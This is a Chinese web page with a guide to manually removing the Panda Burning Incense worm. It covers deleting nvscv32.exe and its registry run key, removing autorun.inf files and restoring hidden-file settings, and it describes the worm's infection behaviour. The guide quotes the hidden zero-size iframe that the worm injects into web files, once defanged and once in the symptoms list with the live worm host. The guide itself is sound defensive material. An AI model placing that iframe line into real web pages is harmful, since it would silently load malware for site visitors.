网站公告列表     学友堂,成就你我!  [admin  2006年11月29日]        
加入收藏
设为首页
联系站长
您现在的位置: 学友堂 >> 电脑网络 >> 防病毒 >> 文章正文
  怎样手动杀灭熊猫烧香(1)           
怎样手动杀灭熊猫烧香(1)
文章来源:不详 更新时间:2007-3-4 0:16:06 本站:学友堂  网址:www.3i3i.cn
学友堂 www.3i3i.cn

怎样手动杀灭熊猫烧香(1)


1.拔网线;

2.重新进入WinXP安全模式,熊猫烧香病毒进程没有加载,可使用“任务管理器”!(提示:开机后按住F8)

3.删除病毒文件:%SystemRoot%\system32\drivers\nvscv32.exe。

4.开始菜单=>运行,运行msconfig命令。在“系统配置实用程序”中,取消与nvscv32.exe相关的进程。也可使用超级兔子魔法设置、HijackThis等,删除nvscv32.exe的注册表启动项。



取消熊猫烧香病毒进程的启动

5.下载并使用江民专杀工具,修复被感染的exe文件。并及时打上Windows补丁。

6.清除html/asp/php等,所有网页文件中如下代码:(为防止传播代码有三处修改,请将“。”换为“.”)

<iframe src=http://www。krvkr。com/worm。htm width=”0” height=”0”></iframe>

批量清除恶意代码的方法:

可使用Dreamweaver的批量替换。


Dreamweaver批理替换的使用方法

可下载使用BatchTextReplacer批量替换。
部署了Symantec AntiVirus的企业,升级到最新病毒库扫描全盘文件,即可清除被添加的恶意代码和清除病毒文件。
7.用安装杀毒软件,并升级病毒库,扫描整个硬盘,清除其他病毒文件。推荐PConline多次推荐的“免费卡巴斯基”——Active Virus Sheild。(xxxxxxxxxxxxx)(注:步骤7不能与步骤5调换,以免可修复的带毒文件被删除!)

8.删除每个盘根目录下的autorun.inf文件,利用搜索功能,将Desktop_.ini全部删除。


二、互联安全网提供的解决方法(后文的病毒描述、中毒现象和技术分析均来自互联安全网)

1:关闭网络共享,断开网络。

2:使用IceSword结束掉nvscv32.exe进程(速度要快,抢在病毒感染IceSword前)

3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1

4:删除注册表启动项

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

5:删除C:\WINDOWS\system32\drivers\nvscv32.exe

6:删除每个盘根目录下的autorun.inf文件和setup.exe文件,利用搜索功能,将Desktop_.ini全部删除。

7:如果电脑上有脚本文件,将病毒代码全部删除。

8:关闭系统的自动播放功能。

这样就基本上将病毒清除了。


三、病毒描述

含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,并对局域网其他电脑进行扫描,同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。

文件名称:nvscv32.exe
病毒名称:目前各杀毒软件无法查杀(已经将病毒样本上报各杀毒厂商)
中文名称:(尼姆亚,熊猫烧香)
病毒大小:68,570 字节
编写语言:Borland Delphi 6.0 - 7.0
加壳方式:FSG 2.0 -> bart/xt
发现时间:2007.1.16
危害等级:高

四、中毒现象

1:在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。

2:无法手工修改“文件夹选项”将隐藏文件显示出来。

3:在每个感染后的文件夹中可见Desktop_ini的隐藏文件,内容为感染日期 如:2007-1-16

4:电脑上的所有脚本文件中加入以下代码:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

5:中毒后的机器上

文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最 新 热 门
    最 新 推 荐
    相 关 文 章
    怎样选择和使用红外摄像
    安全保障 怎样不让SIM卡
    怎样衡量耳机的阻抗
    怎 样 激 活 邮 箱
    怎样使用电脑最省电?
    怎样清理电脑键盘?
    怎样提高U盘性能
    怎样维护电脑的系统? 一
    怎样优化关键词的质量度
    自己手动提高U盘性能
     
    版权所有 2004-2012  学友堂 [3i3i.cn] 最佳分辨率 1024×768
    Copyright www.3i3i.cn All rights reserved.